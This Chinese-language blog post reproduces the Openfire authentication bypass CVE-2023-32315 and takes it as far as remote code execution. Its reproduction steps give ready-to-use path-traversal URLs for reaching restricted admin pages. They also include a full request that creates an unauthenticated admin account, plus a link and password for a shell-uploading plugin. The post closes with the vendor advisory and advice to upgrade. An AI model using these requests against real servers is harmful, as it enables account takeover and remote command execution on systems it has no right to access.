从Openfire身份认证绕过漏洞(CVE-2023-32315)到RCE
声明:该网站大部分文章来自作者日常学习笔记,文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任.
从Openfire存在身份认证绕过漏洞(CVE-2023-32315)到RCE
0x01 漏洞描述及影响
一个重要的安全问题影响了 Openfire 的一系列版本,Openfire 是基于 XMPP 协议的跨平台实时协作服务器,由 Ignite Realtime 社区创建.Openfire 的管理控制台(Admin Console)是一个基于 Web 的应用程序,被发现容易受到通过设置环境进行的路径遍历攻击.这允许未经身份验证的用户在已配置的 Openfire 环境中使用未经身份验证的 Openfire 设置环境,以访问为管理用户保留的 Openfire 管理控制台中的受限页面.
0x02 受影响的版本
1 | 受影响的版本 (>= 3.10.0, < 4.6.8 >= 4.7.0, < 4.7.5) |
0x03 漏洞复现
1、判断是否存在日志泄露
1 | https://IP地址:端口/setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp |
.png)
2、获取cookie 创建用户
1 | /setup/setup-s/%u002e%u002e/%u002e%u002e/plugin-admin.jsp |
.png)
1 | /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=XXXX&username=admin666&name=admin666&email=admin%40example.com&password=admin666&passwordConfirm=admin666&isadmin=on&create=Creat+User |
.png)
3、访问登录
1 | https://XXXX/user-properties.jsp?username=用户名 |
.png)
4、上传插件get shell
.png)
插件下载地址:https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass/releases/tag/v0.1
密码:123
.png)
.png)
0x04 修复建议
当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本.链接如下:
https://github.com/igniterealtime/Openfire/security/advisories/GHSA-gw42-f939-fhvm
参考:
评论